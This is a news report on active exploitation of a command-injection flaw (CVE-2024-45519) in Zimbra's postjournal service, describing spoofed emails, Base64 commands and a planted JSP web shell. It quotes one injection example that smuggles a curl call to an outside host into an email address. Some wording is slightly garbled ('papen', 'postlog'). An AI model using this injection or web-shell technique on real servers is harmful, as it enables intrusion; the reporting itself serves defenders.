Cybersecurity researchers are warning of active exploit attempts targeting a newly discovered security flaw in Synacor’s Zimbra Collaboration.
Enterprise security firm Proofpoint said it began monitoring activity on September 28, 2024. The attacks aimed to use CVE-2024-45519a serious security flaw in the postjournal service that could allow unauthenticated attackers to execute arbitrary commands on compromised Zimbra installations.
“Gmail spoofed emails were sent to fake addresses in CC fields in an attempt by Zimbra servers to parse and execute them as commands” – Proofpoint said in a series of messages on X. “Addresses contained Base64 strings executed using the sh utility.”
A critical issue was addressed by Zimbra’s versions 8.8.15, patch 46, 9.0.0, patch 41, 10.0.9 and 10.1.1 released on September 4, 2024. A security researcher named lebr0nli (Alan Lee) is credited with discovering and reporting the flaws.
“Even though the post-journaling feature may be optional or not enabled on most systems, it is still necessary to apply the provided patch to prevent a potential exploit,” Ashish Kataria, Security Architect Engineer at Synacor noted in a comment on September 19, 2024.
“For Zimbra systems where the postlog feature is not enabled and the patch cannot be applied immediately, removing the postlog binary can be considered as a temporary measure until the patch can be applied.”
Proofpoint said it has identified a number of CC’d addresses that, when decrypted, attempt to write a web shell on a vulnerable Zimbra server at: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp”.
The installed web shell then listens for an incoming connection with a predefined JSESSIONID cookie field and, if present, proceeds to parse the JACTION cookie for Base64 commands.
The web shell is equipped with support for executing commands via exec. Additionally, it can also download and execute a file via a socket connection. At the time of writing, the attacks have not been attributed to a known threat or group.
However, the exploit activity appears to have begun a day after Project Discovery published technical details of the flaw, which said this “results from the transmission of unauthorized user input papen in the unpatched version, allowing attackers to enter arbitrary commands.”
The cyber security company found the problem lies in how the C-based postjournal binary handles and parses recipient email addresses in a function called “msg_handler()”, thereby allowing a command to be injected into a service running on port 10027 by passing a specially crafted SMTP messages with a fake address (eg “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
Due to active exploitation attempts, users are strongly advised to apply the latest patches for optimal protection against potential threats.
